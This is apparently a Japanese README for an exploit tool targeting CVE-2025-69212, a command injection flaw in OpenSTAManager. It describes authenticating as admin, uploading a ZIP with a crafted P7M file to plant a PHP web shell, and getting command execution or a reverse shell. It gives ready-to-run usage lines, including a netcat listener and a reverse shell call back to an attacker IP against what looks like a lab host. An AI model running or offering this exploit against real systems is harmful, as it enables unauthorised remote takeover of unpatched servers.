
OpenSTAManagerにおけるCVE-2025-69212コマンドインジェクション用の自動化エクスプロイト。管理者認証、悪意のあるZIPアップロード、リバースシェルまたはコマンド実行を備えています。
CVE-2025-69212 用の完全自動エクスプロイトスクリプトです。これは OpenSTAManager のコマンドインジェクション脆弱性です。このスクリプトは管理者資格情報で認証し、ZIP アーカイブ内の細工された P7M ファイルを介して悪意のある PHP Web シェルを展開し、コマンド実行またはリバースシェルを提供します。
invoice.p7m インジェクション)。python3 exploit.py -u <TARGET_URL> -U <USERNAME> -P <PASSWORD> -r <LHOST> <LPORT>
単一コマンドを実行:
python3 exploit.py -u http://support_001.enigma.htb -U admin -P 'Password123' -c 'id'
リバースシェルを取得:
# Start your netcat listener in another terminal:
nc -lvnp 4444
# Run the exploit:
python3 exploit.py -u http://support_001.enigma.htb -U admin -P 'Password123' -r 10.10.14.1 4444